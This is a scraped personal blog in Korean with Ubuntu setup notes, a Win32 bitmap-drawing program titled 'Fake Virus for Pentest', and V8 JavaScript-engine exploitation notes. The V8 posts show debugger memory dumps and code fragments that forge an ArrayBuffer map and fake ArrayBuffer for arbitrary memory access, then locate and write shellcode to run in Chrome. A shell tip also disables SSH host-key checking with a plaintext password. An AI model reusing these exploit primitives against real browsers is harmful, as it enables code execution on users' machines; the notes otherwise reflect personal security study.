Most other answers are outdated. For Ubuntu 18.04 (or recent Debian distros), try:sudo vmhgfs-fuse .host:/ /mnt/hgfs/ -o allow_other -o uid=1000

If the hgfs directory doesn't exist, try:

sudo vmhgfs-fuse .host:/ /mnt/ -o allow_other -o uid=1000

You may have use a specific folder instead of .host:/. In that case you can find out the share's name with vmware-hgfsclient. For example:

$ vmware-hgfsclient my-shared-folder $ sudo vmhgfs-fuse .host:/my-shared-folder /mnt/hgfs/ -o allow_other -o uid=1000

If you want them mounted on startup, update /etc/fstab with the following:

# Use shared folders between VMWare guest and host .host:/ /mnt/hgfs/ fuse.vmhgfs-fuse defaults,allow_other,uid=1000 0 0

I choose to mount them on demand and have them ignored by sudo mount -a and the such with the noauto option, because I noticed the shares have an impact on VM performance.

Requirements

Software requirements may require installing the following tools beforehand:

sudo apt-get install open-vm-tools open-vm-tools-desktop

Others have claimed the following are required:

sudo apt-get install build-essential module-assistant \ linux-headers-virtual linux-image-virtual && dpkg-reconfigure open-vm-tools

'ubuntu install' 카테고리의 다른 글

sshpass 사용  (0) 2020.01.04
FTP 서버 변경하기 (daumkakao 서버)  (0) 2020.01.04
ssh 설치  (0) 2020.01.04
Posted by goldpapa
,

sshpass 사용

ubuntu install 2020. 1. 4. 15:48

 sshpass -p 'password' ssh -o StrictHostKeyChecking=no 'user_id'@IP' 

'ubuntu install' 카테고리의 다른 글

ubuntu share folder  (0) 2020.01.04
FTP 서버 변경하기 (daumkakao 서버)  (0) 2020.01.04
ssh 설치  (0) 2020.01.04
Posted by goldpapa
,

sudo vi /etc/apt/sources.list

 

: 콜론 입력

%s/kr.archive.ubuntu.com/ftp.daumkakao.com

 

'ubuntu install' 카테고리의 다른 글

ubuntu share folder  (0) 2020.01.04
sshpass 사용  (0) 2020.01.04
ssh 설치  (0) 2020.01.04
Posted by goldpapa
,

ssh 설치

ubuntu install 2020. 1. 4. 15:22

그래야 편하게 사용하니까

'ubuntu install' 카테고리의 다른 글

ubuntu share folder  (0) 2020.01.04
sshpass 사용  (0) 2020.01.04
FTP 서버 변경하기 (daumkakao 서버)  (0) 2020.01.04
Posted by goldpapa
,

파일을 읽어서 이미지에 넣고 그린다

'''

#include

#include

#include <windows.h>

using namespace std;

/* This is where all the input to the window goes to */
LRESULT CALLBACK WndProc(HWND hwnd, UINT Message, WPARAM wParam, LPARAM lParam) {
switch(Message) {

    /* Upon destruction, tell the main thread to stop */
    case WM_DESTROY: {
        PostQuitMessage(0);
        break;
    }

    /* All other messages (a lot of them) are processed using default procedures */
    default:
        return DefWindowProc(hwnd, Message, wParam, lParam);
}
return 0;

}

/* The 'main' function of Win32 GUI programs: this is where execution starts /
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow) {
WNDCLASSEX wc; /
A properties struct of our window /
HWND hwnd; /
A 'HANDLE', hence the H, or a pointer to our window /
MSG msg; /
A temporary location for all messages */

/* zero out the struct and set the stuff we want to modify */
memset(&wc,0,sizeof(wc));
wc.cbSize         = sizeof(WNDCLASSEX);
wc.lpfnWndProc     = WndProc; /* This is where we will send messages to */
wc.hInstance     = hInstance;
wc.hCursor         = LoadCursor(NULL, IDC_ARROW);

/* White, COLOR_WINDOW is just a #define for a system color, try Ctrl+Clicking it */
wc.hbrBackground = (HBRUSH)(COLOR_WINDOW+1);
wc.lpszClassName = "WindowClass";
wc.hIcon         = LoadIcon(NULL, IDI_APPLICATION); /* Load a standard icon */
wc.hIconSm         = LoadIcon(NULL, IDI_APPLICATION); /* use the name "A" to use the project icon */

if(!RegisterClassEx(&wc)) {
    MessageBox(NULL, "Window Registration Failed!","Error!",MB_ICONEXCLAMATION|MB_OK);
    return 0;
}
 hwnd = CreateWindowEx(WS_EX_CLIENTEDGE,"WindowClass","Fake Virus for Pentest",WS_VISIBLE|WS_OVERLAPPEDWINDOW,
    CW_USEDEFAULT, /* x */
    CW_USEDEFAULT, /* y */
    640, /* width */
    480, /* height */
    NULL,NULL,hInstance,NULL);

if(hwnd == NULL) {
    MessageBox(NULL, "Window Creation Failed!","Error!",MB_ICONEXCLAMATION|MB_OK);
    return 0;
}

HBITMAP hBitmap;

// From File:
//hBitmap = (HBITMAP)LoadImage(hInstance, "a.bmp", IMAGE_BITMAP, 0, 0, LR_LOADFROMFILE | LR_CREATEDIBSECTION);

std::ifstream is;
is.open("a.bmp", std::ios::binary);
is.seekg (0, std::ios::end);
int length = is.tellg();
is.seekg (0, std::ios::beg);
char * pBuffer = new char [length];
is.read (pBuffer,length);
is.close();

tagBITMAPFILEHEADER bfh = (tagBITMAPFILEHEADER)pBuffer;
tagBITMAPINFOHEADER bih = (tagBITMAPINFOHEADER)(pBuffer+sizeof(tagBITMAPFILEHEADER));
RGBQUAD rgb = (RGBQUAD)(pBuffer+sizeof(tagBITMAPFILEHEADER)+sizeof(tagBITMAPINFOHEADER));

BITMAPINFO bi;
bi.bmiColors[0] = rgb;
bi.bmiHeader = bih;

char* pPixels = (pBuffer+bfh.bfOffBits);

char* ppvBits;

hBitmap = CreateDIBSection(NULL, &bi, DIB_RGB_COLORS, (void**) &ppvBits, NULL, 0);
SetDIBits(NULL, hBitmap, 0, bih.biHeight, pPixels, &bi, DIB_RGB_COLORS);

//GetObject(hBitmap, sizeof(BITMAP), &cBitmap);

// From Resource:
//hBitmap = LoadBitmap(MAKEINTRESOURCE(IDB_MYBMP));

BITMAP BMP;
GetObject(hBitmap, sizeof(BMP), &BMP); // Here we get the BMP header info.

HDC BMPDC = CreateCompatibleDC(NULL); // This will hold the BMP image itself.

HDC hDC = GetDC(hwnd);
SelectObject(BMPDC, hBitmap); // Put the image into the DC.

BitBlt(hDC, 0, 0, BMP.bmWidth, BMP.bmHeight, BMPDC, 0, 0, SRCCOPY); // Finally, Draw it

ReleaseDC(hwnd, hDC);

// Don't forget to clean up!
DeleteDC(BMPDC);
DeleteObject(hBitmap);

/*
    This is the heart of our program where all input is processed and 
    sent to WndProc. Note that GetMessage blocks code flow until it receives something, so
    this loop will not produce unreasonably high CPU usage
*/
while(GetMessage(&msg, NULL, 0, 0) > 0) { /* If no error is received... */
    TranslateMessage(&msg); /* Translate key codes to chars if present */

''' DispatchMessage(&msg); /* Send i
t to WndProc */
}
return msg.wParam;
}
```

Posted by goldpapa
,

v8에서 v8에서 정수는 *2한 짝수로 변환되고 주소는 +1한 홀수를 사용한다

그러므로 정수를 이용한 주소값 ****을 할 수 없다

현재 map을 정상적으로 만들지 못해서 큰일이다

 

gef➤  x/16wx 0x38a08194
0x38a08194: 0x22684ba9 0x35e04125 0x38a07f91 0x00000014
0x38a081a4: 0x23785021 0x33618ee5 0x22684c2d 0x35e04125
0x38a081b4: 0x38a081bd 0x00000014 0x23784185 0x00000014
0x38a081c4: 0x336197fd 0x3361980d 0x3361981d 0x3361982d
gef➤  x/16wx 0x22684ba8
0x22684ba8: 0x2378412d 0x17000004 0x000100c2 0x092007ff
0x22684bb8: 0x33607785 0x336075a9 0x3360794d 0x33607969
0x22684bc8: 0x35e04125 0x35e04125 0x33607985 0x2378412d
0x22684bd8: 0x17000004 0x000500c2 0x082083ff 0x33605171

gef➤  x/16wx 0x38a07f90
0x38a07f90: 0x2378433d 0x00000014 0x00000002 0x00000004
0x38a07fa0: 0x00000006 0x00000008 0x0000000a 0x0000000c
0x38a07fb0: 0x0000000e 0x00000010 0x00000012 0x00000014
0x38a07fc0: 0x237843c1 0x00000003 0x000000cc 0x5f415343

gef➤  x/32wx 0x2378433c
0x2378433c: 0x2378412d 0x06000000 0x001900a9 0x082003ff
0x2378434c: 0x35e04101 0x35e04101 0x00000000 0x35e0411d

gef➤  x/16w 0x35e04100
0x35e04100: 0x23784159 0x00000000 0x00000000 0x35e0412d
0x35e04110: 0x00000000 0x35e0413d 0x00000006 0x23784185
0x35e04120: 0x00000000 0x23784185 0x00000000 0x237841b1
0x35e04130: 0x3043247e 0x00000008 0x6c6c756e 0x237841b1
gef➤  x/16wx 0x23784158
0x23784158: 0x2378412d 0x33000007 0x00001083 0x002003ff
0x23784168: 0x35e04101 0x35e04101 0x00000000 0x35e0411d
0x23784178: 0x35e04125 0x35e04125 0x00000000 0x2378412d
0x23784188: 0x06000000 0x001800a9 0x002003ff 0x35e04101

Posted by goldpapa
,

gef➤  c
Continuing.
[object ArrayBuffer]
DebugPrint: 0x2790818d: [JSArrayBuffer]
 - map = 0x474865c9 [FastProperties]
 - prototype = 0x4b28f2d1
 - elements = 0x5cc04125 <FixedArray[0]> [FAST_HOLEY_SMI_ELEMENTS]
 - internal fields: 2
 - backing_store = 0x565f07a0
 - byte_length = 12
 - properties = {
 }
 - internal fields = {
    0
    0
 }
0x474865c9: [Map]
 - type: JS_ARRAY_BUFFER_TYPE
 - instance size: 32
 - inobject properties: 0
 - elements kind: FAST_HOLEY_SMI_ELEMENTS
 - unused property fields: 0
 - enum length: invalid
 - stable_map
 - back pointer: 0x5cc041a1 
 - instance descriptors (own) #0: 0x5cc0411d <FixedArray[0]>
 - prototype: 0x4b28f2d1 
 - constructor: 0x4b28f299 
 - code cache: 0x5cc04125 <FixedArray[0]>
 - dependent code: 0x5cc04125 <FixedArray[0]>
 - construction counter: 0

 

gef➤  x/32wx 0x2790818c
0x2790818c: 0x474865c9 0x5cc04125 0x5cc04125 0x00000018
0x2790819c: 0x565f07a0 0x00000004 0x00000000 0x00000000
0x279081ac: 0x474864c1 0x5cc04125 0x5cc04125 0x2790818d
0x279081bc: 0x00000000 0x00000018 0x00000000 0x00000000
0x279081cc: 0x48e84839 0x00000003 0x00000026 0x5cc42459
0x279081dc: 0x5cc4e669 0x48e84839 0x00000003 0x00000028
0x279081ec: 0x279081cd 0x5cc06995 0xdeadbeef 0xdeadbeef
0x279081fc: 0xdeadbeef 0xdeadbeef 0xdeadbeef 0xdeadbeef
gef➤  x/32wx 0x474865c8
0x474865c8: 0x48e8412d 0x3d000008 0x000900c3 0x082003ff
0x474865d8: 0x4b28f2d1 0x4b28f299 0x00000000 0x5cc0411d
0x474865e8: 0x5cc04125 0x5cc04125 0x00000000 0x48e8412d
0x474865f8: 0x1a000407 0x031d00bc 0x082013ff 0x4b285171
0x47486608: 0x4b28518d 0x00000000 0x4b28f2ed 0x5cc04125
0x47486618: 0x5cc04125 0x00000000 0x48e8412d 0x1d00000a
0x47486628: 0x007100c4 0x082003ff 0x4b28f48d 0x4b28f455
0x47486638: 0x00000000 0x5cc0411d 0x5cc04125 0x5cc04125
gef➤  x/32wx 0x5cc04124
0x5cc04124: 0x48e84185 0x00000000 0x48e841b1 0x3043247e
0x5cc04134: 0x00000008 0x6c6c756e 0x48e841b1 0xae4b45da
0x5cc04144: 0x0000000c 0x656a626f 0xdead7463 0x48e84235
0x5cc04154: 0x00000000 0xbff00000 0x5cc0416d 0xfffffffe
0x5cc04164: 0x5cc04189 0x0000000c 0x48e841b1 0xe697d962
0x5cc04174: 0x0000001a 0x6e696e75 0x61697469 0x657a696c
0x5cc04184: 0xdeadbe64 0x48e841b1 0x21a3306e 0x00000012
0x5cc04194: 0x65646e75 0x656e6966 0xdeadbe64 0x48e84261
gef➤  x/32wx 0x48e84184
0x48e84184: 0x48e8412d 0x06000000 0x001800a9 0x002003ff
0x48e84194: 0x5cc04101 0x5cc04101 0x00000000 0x5cc0411d
0x48e841a4: 0x5cc04125 0x5cc04125 0x00000000 0x48e8412d
0x48e841b4: 0x00007700 0x00190004 0x082003ff 0x5cc04101
0x48e841c4: 0x5cc04101 0x00000000 0x5cc0411d 0x5cc04125
0x48e841d4: 0x5cc04125 0x00000000 0x48e8412d 0x14000001
0x48e841e4: 0x00190095 0x082003ff 0x5cc04101 0x5cc04101
0x48e841f4: 0x00000000 0x5cc0411d 0x5cc04125 0x5cc04125

 

root@ubuntu1804:~/hack/hack/docker/ubuntu1804/hack/v8/v8/out.gn/ia32.debug# ./d8 --allow_natives_syntax 1.js
[-] 22.ab2_map_obj_addr: 0x52cd5b21
[-] 3.fake_ab_float_addr: 0x52ce9441
debug
fp = 0xffffcc04, sp = 0xffffcbc8, caller_sp = 0xffffcc0c: #
0x52ce9441: [JSArrayBuffer]
 - map = 0x52cc1ee9 [FastProperties]
 - prototype = 0x3fb8f2d1
 - elements = 0x52cd5b21 <FixedArray[0]> [FAST_HOLEY_SMI_ELEMENTS]
 - internal fields: 2
 - backing_store = 0x12345678
 - byte_length = 8192
 - properties = {
 }
 - internal fields = {
    0
    0
 }

1.js:195: TypeError: First argument to DataView constructor must be an ArrayBuffer
fake_dv = new DataView(fake_arraybuffer,1,0x2000);
           ^
TypeError: First argument to DataView constructor must be an ArrayBuffer
    at new DataView ()
    at 1.js:195:12

 

 

Posted by goldpapa
,

[64bit 코드]        

        var nop = 0xdaba0000;
        var ab_map_obj = [
                nop,nop,
                0x1f000008,0x000900c0,0x082003ff,0x0,
                nop,nop,   // use ut32.prototype replace it
                nop,nop,0x0,0x0
        ]

[32bit 코드]

        var nop = 0xdaba0000;
        var ab_map_obj = [
                nop,0x3d000008 0x000900c3 0x082003ff
                nop,nop,   // use ut32.prototype replace it
                0x0,nop
        ]

 

[안되는 코드]

gef➤  x/32wx 0x4eba2fe0
0x4eba2fe0: 0x3c4d4fd1 0x3c4d4fd1 0x3c4d4fd1 0x00004000
0x4eba2ff0: 0x12345678 0x00000004 0x00000000 0x00000000
0x4eba3000: 0x9999999a 0x3ff19999 0x9999999a 0x3ff19999

gef➤  x/32wx 0x3c4d4fd0
0x3c4d4fd0: 0xdaba0000 0x3d000008 0x000900c3 0x082003ff
0x3c4d4fe0: 0x3608f2d1 0x3608f299 0x00000000 0x00000000
0x3c4d4ff0: 0x9999999a 0x3ff19999 0x9999999a 0x3ff19999

[정상]

gef➤  x/32wx 0x4150818c
0x4150818c: 0x43f065c9 0x4c684125 0x4c684125 0x00000018
0x4150819c: 0x565f07a0 0x00000004 0x00000000 0x00000000
0x415081ac: 0x43f064c1 0x4c684125 0x4c684125 0x4150818d
gef➤  x/32wx 0x43f065c8
0x43f065c8: 0x5f28412d 0x3d000008 0x000900c3 0x082003ff
0x43f065d8: 0x3ed0f2d1 0x3ed0f299 0x00000000 0x4c68411d
0x43f065e8: 0x4c684125 0x4c684125 0x00000000 0x5f28412d

 

 

[디버깅용 코드]

var buffer = new ArrayBuffer(12);
var dataView = new DataView(buffer);
print(buffer);
%DebugPrint(buffer);
print("ok");

 

gef➤  b *fprintf
Breakpoint 1 at 0xf5f4d2b0
gef➤  r --allow_natives_syntax test.js

 

 

 

 

 

Posted by goldpapa
,

[.] 1.ab_prot_addr: 0xaedb4791b49

gef➤  x/32gx 0xaedb4791b48-0x70
0xaedb4791ad8: 0x00000f52d2183179 0x00000aedb4791b21
0xaedb4791ae8: 0x00000c3bb5c02241 0x00000f52d2185fe1
0xaedb4791af8: 0x00000c3bb5c68ae9 0x00000aedb4783bf9
0xaedb4791b08: 0x00000c3bb5c04cf9 0x00000196d55d2200
0xaedb4791b18: 0x00000c3bb5c02311 0x00003b553b682309
0xaedb4791b28: 0x0000000300000000 0x0000000800000000
0xaedb4791b38: 0x00000c3bb5c02311 0x00000c3bb5c02311
0xaedb4791b48: 0x00000f52d2186039 0x00000c3bb5c02241
0xaedb4791b58: 0x00000c3bb5c02241 0x00000b29b95a39c9
0xaedb4791b68: 0x0000000000000000 0x0000000000000000


[.] 2.u2d(ab_map_obj_float[0x3]): 0xaedb4791b49


[.] 3.ab_map_obj_addr: 0x16929c50a621

gef➤  x/32gx 0x16929c50a620-0x40
0x16929c50a5e0: 0x00000f52d2183c79 0x00000c3bb5c02241
0x16929c50a5f0: 0x000016929c50a611 0x0000000600000000
0x16929c50a600: 0x00003b553b683f91 0x00000aedb47c9eb1
0x16929c50a610: 0x00003b553b682e09 0x0000000600000000
0x16929c50a620: 0xdaba0000daba0000 0x000900c01f000008
0x16929c50a630: 0x00000000082003ff 0x00000aedb4791b49      ; ab_proto_addr = read_obj_addr(ab.__proto__);
0x16929c50a640: 0x00000aedb4791ad9 0x0000000000000000   ; ab_constructor_addr = ab_proto_addr - 0x70;
0x16929c50a650: 0x00003b553b682519 0x41eb574000000000
0x16929c50a660: 0x00003b553b682519 0x41eb574000000000

[참조]

gef➤  x/20gx 0x0000358452d8ba80
0x358452d8ba80: 0x000023b229484569 0x0000125339f82241      ; 디버깅을 해보면 다른 값이 출력되나 첫번째 값으로 해도  ok0x358452d8ba90: 0x0000125339f82241 0x0000358452d8ba41   ; 단, 다른 값을 사용하면 --allow_natives_syntax 는 꽥임
0x358452d8baa0: 0x0000000000000000 0x0000000c00000000
0x358452d8bab0: 0x0000000000000000 0x0000000000000000
0x358452d8bac0: 0x00000e2a9ea831d1 0x0000000000000003

 

gef➤  x/32gx 0x000023b229484568
0x23b229484568: 0x00000e2a9ea82259 0x000900c21b000008 ; 정상적으로 디버깅 한 값과 같음
0x23b229484578: 0x00000000082003ff 0x00001b050c00b471 ; ab .value
0x23b229484588: 0x00001b050c00b401 0x0000000000000000

 

 

        var nop = 0xdaba0000;
        var ab_map_obj = [
                nop,nop,
                0x1f000008,0x000900c0,0x082003ff,0x0,
                nop,nop,   // use ut32.prototype replace it
                nop,nop,0x0,0x0
        ]
        ab_proto_addr = read_obj_addr(ab.__proto__);
        ab_constructor_addr = ab_proto_addr - 0x70;
        //alert(ab_proto_addr.toString(16));
        ab_map_obj[0x6] = ab_proto_addr & 0xffffffff;
        ab_map_obj[0x7] = ab_proto_addr / 0x100000000;
        ab_map_obj[0x8] = ab_constructor_addr & 0xffffffff;
        ab_map_obj[0x9] = ab_constructor_addr / 0x100000000;
        float_arr = [];
        /*for(var i = 0;i < 0x100;i++){
                float_arr[i] = [1.1,1.1,1.1,1.1,1.1,1.1];
        }*/
        gc();
        var ab_map_obj_float = [1.1, 1.1, 1.1, 1.1, 1.1, 1.1];  //6개
        change_to_float(ab_map_obj,ab_map_obj_float);


[.] 4.fake_ab_float_addr: 0x16929c56d571

➤  x/32gx 0x16929c56d570-0x40
0x16929c56d530: 0x00000f52d2183c79 0x00000c3bb5c02241
0x16929c56d540: 0x000016929c56d561 0x0000000600000000
0x16929c56d550: 0x00003b553b683f91 0x00000aedb47d0091
0x16929c56d560: 0x00003b553b682e09 0x0000000600000000
0x16929c56d570: 0x000016929c50a621 0x000016929c50a621
0x16929c56d580: 0x000016929c50a621 0x0000400000000000      ; 버퍼길이
0x16929c56d590: 0x00000196d55e9ba0 0x0000000000000004
0x16929c56d5a0: 0x00003b553b682519 0x40b6929c50a62100
0x16929c56d5b0: 0x00003b553b682519 0xc1d8ebd677c00000

        var fake_ab = [
                ab_map_obj_addr & 0xffffffff, ab_map_obj_addr / 0x100000000,
                ab_map_obj_addr & 0xffffffff, ab_map_obj_addr / 0x100000000,
                ab_map_obj_addr & 0xffffffff, ab_map_obj_addr / 0x100000000,
                0x0,0x4000, /* buffer length */
                0x12345678,0x123,/* buffer address */
                0x4,0x0
        ]
        var fake_ab_float = [1.1,1.1,1.1,1.1,1.1,1.1];   //6개
        change_to_float(fake_ab,fake_ab_float);


[.] 5.fake_ab_float[4]: 0x12312345678

        fake_arraybuffer = double_arr42[1];
        fake_dv = new DataView(fake_arraybuffer,0,0x4000);

almost done!!


[.]shellcode_address_ref: 0x1f85944d4560
[.]shellcode_address_ref: 0x1f85944d4560

gef➤  x/32gx 0x1f85944d4560
0x1f85944d4560: 0x00000196d55e9ba0 0x00000c3bb5c02311
0x1f85944d4570: 0x00000f52d218ee31 0x00001f85944d45a1
0x1f85944d4580: 0x00001f85944d4961 0x0000000100000000
0x1f85944d4590: 0x00003b553b683f91 0x00000aedb47d8429
0x1f85944d45a0: 0x00003b553b682309 0x0000000300000000
0x1f85944d45b0: 0x0000000100000000 0x00000c3bb5c02311
0x1f85944d45c0: 0x00000c3bb5c02311 0x00003b553b682e09


[.]shellcode_address: 0x196d55e9ba0

gef➤  x/32gx 0x196d55e9ba0
0x196d55e9ba0: 0x90909090cccccccc 0x0f014f40f61f478b
0x196d55e9bb0: 0x708b4c000000c585 0x96d55e9b41b9483f
0x196d55e9bc0: 0x0f07483b48000001 0x4f8b48000000ba85


[.]shellcode write
[.]shellcode write
[*]go to shellcode plz,chrome!

Posted by goldpapa
,

 

 

http://eternalsakura13.com/2018/08/02/v8_debug/

Posted by goldpapa
,